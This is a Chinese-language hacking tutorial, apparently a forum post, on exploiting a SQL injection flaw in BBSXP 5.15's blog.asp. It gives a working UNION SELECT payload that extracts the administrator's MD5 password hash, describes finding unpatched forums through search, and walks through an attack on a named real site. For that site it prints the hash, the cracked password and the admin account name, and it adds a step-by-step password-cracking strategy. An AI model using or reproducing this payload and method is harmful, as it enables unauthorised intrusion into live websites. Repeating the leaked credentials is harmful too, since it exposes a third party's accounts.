BBSXP5.15最新漏洞精简版

首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛，随便点个，好就这个bbs.yuntea.com 真幸运，这个站还没打上补丁，一口做气杀到底，bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以让直接构造数据库命令    
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   
后台区长的md5密码就显示出来了。   
前台密码也可以出来，   
网上已经有相关动画，软件。   
就利用这个漏洞，肯定有一批bbsxp的网站要倒下了   
接下来就是讲工具了，准备好MD5密码破解器   
关于md5的破解，比较好使的有md5cracker速度增强版。   
1。先用8位或9位数字跑。很快。   
2。如果不行，用小写字母跑。选择5－6位比较好。   
3。再不行，说明密码可能使字母加数字，可以碰碰运气。可以配置一个精品自典，比如10G的，   
   跑上及几个小时。（你的机器配置必须很好）   
4。再不行，建议放弃，太变态了。   
前台ok...后台密码..（注：你必须知道管理员的帐号）   
直接默认的配置就是直接拿下后台密码...   
直接吧前台md5密码暴出来。   
剩下的事就事破解md5了。   
现在开始进行工作了，在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样，如果有2个加密密码那就是代表1个是前台的一个是后台的，不多说了，看操作   
按照上面工具的介绍先用数字把，   
正在破===耐心等等   
我接条信息，大家不介意把~   
出来了，密码是82246124，登入，，他的帐号是wzwu，密码82246124，登入成功，后台登入，密码82246124，登入成功，下面的因该知道把，我也就不多说了，以免遭到人家的痛骂。   
bBsxp5.15最新漏洞的原始作者不清